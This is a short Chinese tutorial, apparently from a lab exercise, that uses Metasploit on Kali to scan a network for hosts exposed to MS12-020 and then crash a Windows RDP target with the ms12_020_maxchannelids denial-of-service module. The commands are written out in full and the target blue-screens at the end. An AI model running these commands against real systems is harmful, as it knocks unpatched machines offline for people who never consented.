打开kali终端,输入msfconsole,等待一段时间后,进入msf控制端
输入search ms12-020,这条指令是搜索ms12-020模块
上面那个auxiliary/dos/windows/rdp/ms12_020_maxchannelids是攻击模块,我们先不看,先看下面的搜索模块
输入use auxiliary/scanner/rdp/ms12_020_check
然后我们show options一下
由于这个攻击需要靶机开启3389,所以我们的port默认是3389不要动,rhosts由于后面有s,所以很容易明白这可以设置成一个网段,也可以是一个ip,知道ip是更快的。为了更普遍,我们设成一个网段,这里时间较久,由于我的靶机是192.168.0.143
所以输入set RHOSTS 192.168.0.1/24
然后输入run或者exploit开始查找
我们可以看到它已经再开始查找了,我们发现192.168.0.143前面是绿色的+,这是开启的意思。
这时候我们就可以使用上面提到的auxiliary/dos/windows/rdp/ms12_020_maxchannelids模块了
输入use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
然后set RHOST 192.168.0.143(也可以先show options)
最后run
观测03靶机已经蓝屏了,重启就好了